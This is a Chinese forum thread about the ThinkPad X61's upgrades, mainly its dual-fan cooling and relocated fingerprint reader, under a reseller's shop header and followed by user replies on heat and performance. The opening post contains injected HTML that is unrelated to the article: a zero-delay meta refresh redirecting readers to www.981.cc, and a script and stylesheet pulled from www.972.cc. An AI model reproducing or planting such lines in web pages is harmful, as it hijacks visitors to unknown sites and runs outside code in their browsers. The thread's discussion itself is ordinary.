开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

ThinkPad X61改进一览

从此前泄露的ThinkPad X61的照片,我们已经很清楚的了解到,X61并没有采用宽屏设计,而是沿用了X60非宽屏的设计,在外观看来改进也非常有限,难道X61仅仅是平台升级那么简单吗?我们下面就来看看X61的改进。
<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

除了整体升级到迅驰4平台,X61大幅改进了散热性能,大胆的采用了双风扇的设计,这对于12英寸机型来说绝对不多见,看来12英寸机型热量偏大的现象,将在X61上宣告终结。

根据透露的资料来看,新增加的风扇将安置在触摸板的后下方,形成一个全新的风道:自机身的右侧USB接口等处进风,贯穿整个机身出风,从而降低整个腕托、触摸板等部分的热量,尤其对于热量越来越大的硬盘,绝对是个好消息。
而为了安置这个风扇,原本在触摸板后方的指纹识别,也因而移动到了触摸板的右方,主板上的元件也相对的调整了位置。
看来对于散热,是下了狠功夫了
就是不知道这样,温度是否大为改观?
散热是笔记本的软肋,期待改进的结果。
装了2个风扇不知噪音控制的怎么样?
不知道硬件的提升有多少,现在买X60是不是时候啊
x系列如果宽屏的话,实在是没法要了,键盘两侧空出一块。要多丑有多丑
性能有哪些地提升呢??
而为了安置这个风扇,原本在触摸板后方的指纹识别,也因而移动到了触摸板的右方,主板上的元件也相对的调整了位置。
改动比较大,呵呵,很期待啊
期待X71
原帖由 唐僧 于 2007-7-6 18:00 发表
期待X71

晕死
噪音???
据说温度改进不大,很多大侠通过调低无线卡的功率来降温,好像效果还不错。而且61的双风扇设计好像要分区域的。以上是在其它论坛里看到的,不知道准确度有多大
不知道性能提升怎么样啊
不错~
东西当然是越来越好咯~
要是有足够多的米就好了!
改动比较大,呵呵,很期待啊
改的不错,不过还是喜欢T
性能有哪些地提升呢??
看评测只比X60低那么一点点。而且传说中的2个风扇也只是一个。。。
据说温度比60高了不少
其他的都差不多了吧
7200的硬盘再加上大功率的u温度自然上去了!
不知道62出来温度能怎么样。。。。现在关心T系列的~
x就是屏幕小点~~

不过八心的电池到是很厉害吧